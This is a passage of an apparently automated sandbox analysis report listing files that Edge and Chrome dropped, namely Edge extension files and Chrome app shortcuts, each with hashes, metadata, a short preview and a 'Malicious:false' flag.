                                                                                                                                                                                                                                                                        SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                        SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                        SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_784423817\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1753
                                                                                                                                                                                                                                                                        Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                        MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                        SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                        SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                        SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_784423817\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9815
                                                                                                                                                                                                                                                                        Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                        MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                        SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                        SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                        SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_784423817\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):10388
                                                                                                                                                                                                                                                                        Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                        MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                        SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                        SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                        SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_784423817\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):962
                                                                                                                                                                                                                                                                        Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                        MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                        SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                        SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                        SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_784423817\cbbc936b-48a8-40d3-a8b0-42c9b4b328a9.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 06:20:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2677
                                                                                                                                                                                                                                                                        Entropy (8bit):3.9763659369780893
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8NCdZjTh5hfHjcidAKZdA19ehwiZUklqehr1ny+3:82r1qS5y
                                                                                                                                                                                                                                                                        MD5:275898CCA411259692F9342130A1611C
                                                                                                                                                                                                                                                                        SHA1:0403AB6025D6354869C7E80113E745309028C225
                                                                                                                                                                                                                                                                        SHA-256:5FFCB9C2C270B642EE2A58716DC723ED55284C7D1D0C17A1756FE7D06FF16447
                                                                                                                                                                                                                                                                        SHA-512:BC8E48A7A8F6C27F2CEB66C6E92D79E652DBAE5535A0C32607965E2FC2E9F1E39609A76244355E1B2E9E815C56BFC16BCFC2FD9CB9B9126C9082DEB0A7C9D228
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......../X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.:...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 06:20:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2679
                                                                                                                                                                                                                                                                        Entropy (8bit):3.9954498567215713
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8+dZjTh5hfHjcidAKZdA1weh/iZUkAQkqehC1ny+2:8sr1g9Ql5y
                                                                                                                                                                                                                                                                        MD5:56CDA64DDAB622817CA8C6DF8E8AE843
                                                                                                                                                                                                                                                                        SHA1:449B4FFCD2AC1CA9541EA3A2F61AC428A5262F03
                                                                                                                                                                                                                                                                        SHA-256:EDD1E31AF949461826DD598D4EAB721CC003D7ADC82969E0A182CC8F220077AD
                                                                                                                                                                                                                                                                        SHA-512:2DC79160BD19DB78164E080D5D96C897790A6D903BC4E472698EACC9A1294B7899567A0AB998311F341ACD32274F9991A0BD7B24C884F63CD1BEA573AE651EFF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......../X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.:...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2693
                                                                                                                                                                                                                                                                        Entropy (8bit):4.006387990180203
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8xCdZjTh5sHjcidAKZdA14tseh7sFiZUkmgqeh7sc1ny+BX:8xwrk4nW5y
                                                                                                                                                                                                                                                                        MD5:DC6E091AE8C079472AB2A2A524D8A823
                                                                                                                                                                                                                                                                        SHA1:C5A3E59F5A68CCD1D894F6FC58C7A979D46E42C9
                                                                                                                                                                                                                                                                        SHA-256:6687CFF9EFBEAD840F83732457A1931DC1B44AB41F81445C063DA728146AF064
                                                                                                                                                                                                                                                                        SHA-512:E7F3994D1A7C4C92D9C6F286FAC2A288726AB49AA45449D7065742D48880E2058F644618ABDA190AB120FD2E3119B816C0A6375E0D41029B3853332B1699237E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 06:20:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                                                        Entropy (8bit):3.9938150512692765
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8g5dZjTh5hfHjcidAKZdA1vehDiZUkwqeh+1ny+R:8Or1rE5y
                                                                                                                                                                                                                                                                        MD5:36F7662AAE1E47877619434EF0080E2A
                                                                                                                                                                                                                                                                        SHA1:51B91B665DD6A745BC923047E1AE4889CADB3FD4
                                                                                                                                                                                                                                                                        SHA-256:418D257D9CBC6866BC59BCE00DF11473335D7C7FEDADD4E7AB726744F4F4A5D4
                                                                                                                                                                                                                                                                        SHA-512:2C842C7D405B4674E6B780C080356482C7E137EE12B8A0BD1505B6C9FD0AE5E9C804891056EC1C2294ABCC79B8AFAFDE981B9F6EC7F6A2D7F849F02D4BCE0990
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....w@../X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.:...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 06:20:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                                                        Entropy (8bit):3.983449776946196
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8wudZjTh5hfHjcidAKZdA1hehBiZUk1W1qehw1ny+C:8vr1r9Q5y
                                                                                                                                                                                                                                                                        MD5:83044A4BEFB448FE008C071B630549A7
                                                                                                                                                                                                                                                                        SHA1:E4EAE130B14AE4A7E77F9E447DB37090E6C79A45
                                                                                                                                                                                                                                                                        SHA-256:667D00CDA4FAA4F0F83C36550F03BF7AB391C705D9D388BE3A0395784F1A75CC
                                                                                                                                                                                                                                                                        SHA-512:3940030CF280BA4D670E9BC2B6C6ED86DC3FD7F4845D9BA527B427FE54A696B1312252B746E62A78CA3F1C385FC6C1BF1CCF6FF9A0D6BCD648077DF880C372BB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......./X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.:...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 06:20:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                                                                                        Entropy (8bit):3.9909239693603826
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8cNdZjTh5hfHjcidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbW1ny+yT+:8er1LT/TbxWOvTbW5y7T
                                                                                                                                                                                                                                                                        MD5:44E7868BDC5B56D1345D67EE8FA94948
                                                                                                                                                                                                                                                                        SHA1:70572F669678F94A513DC3A71F940F5F2B066CFE
